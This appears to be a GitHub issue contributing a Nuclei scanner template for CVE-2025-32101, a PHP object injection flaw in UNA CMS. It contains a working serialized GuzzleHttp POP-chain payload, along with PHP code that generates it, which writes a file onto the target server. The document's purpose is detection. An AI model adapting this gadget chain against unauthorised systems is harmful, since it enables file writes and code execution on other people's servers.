[TEMPLATE CONTRIBUTION] Fix template for CVE-2025-32101 #11933
Description
Is there an existing template for this?
- I have searched the existing templates.
Nuclei Template
id: CVE-2025-32101
info:
name: UNA CMS <= 14.0.0-RC4 - PHP Object Injection
author: iamnoooob,rootxharsh,pdresearch,egix
severity: critical
description: |
The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script. Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this method, user input passed through the "profile_id" POST parameter is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as writing and executing arbitrary PHP code.
reference:
- https://www.exploit-db.com/exploits/52139
- https://karmainsecurity.com/KIS-2025-01
metadata:
verified: true
max-request: 2
fofa-query: body="Powered by UNA"
tags: cve,cve2025,una-cms,php,rce
http:
- raw:
- |
POST /menu.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=O%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A3%3A%7Bs%3A40%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A2%3A%7Bs%3A7%3A%22Expires%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22Value%22%3Bs%3A10%3A%22VULNERABLE%22%3B%7D%7D%7Ds%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A25%3A%22.%2Fcache_public%2Fnuclei.txt%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7D
matchers:
- type: status
internal: true
status:
- 200
- raw:
- |
GET /cache_public/nuclei.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- 'VULNERABLE'Relevant dumped responses
Anything else?
At the moment, the template for CVE-2025-32101 will work only when the affected UNA CMS instance is running on Apache. To make a more generic test, which will work with all web servers, we can use the following "POP chain":
<?php
class GuzzleHttp_Cookie_SetCookie
{
private $data = ['Expires' => '', 'Value' => 'VULNERABLE'];
}
class GuzzleHttp_Cookie_FileCookieJar
{
private $cookies, $filename = './cache_public/nuclei.txt', $storeSessionCookies = true;
function __construct()
{
$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
}
}
$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);
print urlencode($chain);
This will try to write a new file under ./cache_public/nuclei.txt, containing the string VULNERABLE. So, just checking the presence of this file, and matching that string, is enough to test the vulnerability.